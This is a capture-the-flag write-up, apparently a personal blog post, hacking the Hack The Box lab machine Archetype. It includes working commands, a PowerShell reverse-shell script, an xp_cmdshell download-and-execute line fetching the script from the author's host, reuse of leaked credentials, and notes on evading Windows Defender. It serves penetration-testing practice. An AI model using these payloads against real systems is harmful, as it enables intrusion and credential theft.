Hack The Box Archetype has been Pwned!

Reconnaissance

Today we’re going to be hacking in to the Hack The Box machine Archetype. This machine is one of the Starting Point machines that I will be hacking my way through. Ok let’s begin, Once you have spun up the box and connected to the VPN it’s time to get scanning. I tend to run nmap with the following flags;

sudo nmap -sC -sV -O -p0- 10.10.10.27

This will scan all ports and check for the service version, the operating system version and will run any “safe scripts” against the discovered services. It’s not always a good idea to run the vulnerability script but on this occasion I did. The results are shown below.

PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
| smb-vuln-ms08–067: 
| VULNERABLE:
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008–4250

Based on the results I initially went after the ms08–67 vulnerability. I used metasploit to try and hack it but alas, no such luck. There was a problem with the language detection on the remote host so the exploit didn’t work.

The next service I went after was the Server Message Block protocol. The tool smbclient can be used to list the shared directories being served by the SMB service.

smbclient -L 10.10.10.27
Sharename    Type        Comment
 — — — — — — — — — — - - - - - - - - -
 ADMIN$      Disk        Remote Admin
 backups     Disk 
 C$          Disk        Default share
 IPC$        IPC         Remote IPC

Based on the results from smbclient it was evident that the backups directory could be mounted.

smclient \\\\10.10.10.27\\backups

The backup directory contained a file called prod.dtsConfig. It was possible to download this file and view the contents. The file appeared to be a configuration file and contained the password of the ARCHETYPE\sql_svc MSSQL user.

<DTSConfiguration>
 <DTSConfigurationHeading>
 <DTSConfigurationFileInfo GeneratedBy=”…” GeneratedFromPackageName=”…” GeneratedFromPackageID=”…” GeneratedDate=”20.1.2019 10:01:34"/>
 </DTSConfigurationHeading>
 <Configuration ConfiguredType=”Property” Path=”\Package.Connections[Destination].Properties[ConnectionString]” ValueType=”String”>
 <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
 </Configuration>
</DTSConfiguration>

Foothold Hack

Ok, time to start hacking. It was then possible to connect to the MSSQL service using the credentials provided in the prod.dtsConfig file. In order to connect to the MSSQL service I used the Impacket tool mssqlclient.py

python mssqlclient.py ARCHETYPE/[email protected] -windows-auth

After providing the password I was logged on to the server. In order to check whether we had sysadmin level privledges I ran the following command.

SELECT IS_SRVROLEMEMBER(‘sysadmin’)

It appeared that I had sysadmin level privileges so it was time to get a reverse shell set up so I could connect to the box. In order to do this I pinched the following Powershell script and modified it with my IP address and the port I wanted the server to connect to me on.

$client = New-Object System.Net.Sockets.TCPClient(“10.10.15.82”,4000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “#”;$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

It is worth noting that I had a few issues with the following part of the script being picked up by Windows Defender. However after some google fu I disovered the particular paramter it didn’t like. It appears that Windows Defender doesn’t like “PS “ + (pwd).Path + “>. It was also quite particular about the spacing within the “#”; part of the script.

sendback + “PS “ + (pwd).Path + “> “;$sendbyte =

With the script edited and my IP address and port added, it was time to host the script so that the remote server could download and execute it. In order to do this I used the HTTP Python module to serve the file locally.

sudo python3 -m http.server 80

With the file being served on my local machine I had to set up a listener in order to connect the reverse connection from the server to my local machine. In order to do this I used the netcat tool.

sudo nc -lvp 4000

Privilege Escalation Hack

Then on the remote server I ran a command to tell the server to download and execute the script being hosted on my local machine.

xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”http://10.10.15.82/shell.ps1\");"

This created a reverse shell connection back to my local machine. It was then possible to browse the local file system and run commands as though I were logged on to it locally. The first thing I wanted to check and that I recommend checking is the history. It may contain useful information left by the box creator or by other hackers.

#type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

BINGO, there was a valid set of credentials in the history. It was then possible to connect to the server using the Impacket psexec.py tool.

sudo python /usr/share/doc/python3-impacket/examples/psexec.py [email protected]

Once logged in as administrator it was possible to recover all the keys required to complete the box. Hacking is so much fun.

C:\Windows\system32>type C:\Users\sql_svc\Desktop\user.txt
3e7**********************a3

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
b91**********************528

If you liked this post then check out some of my other ones. I have done write-ups for Archetype, Oopsie, Vaccine, Shield, Pathfinder and Included.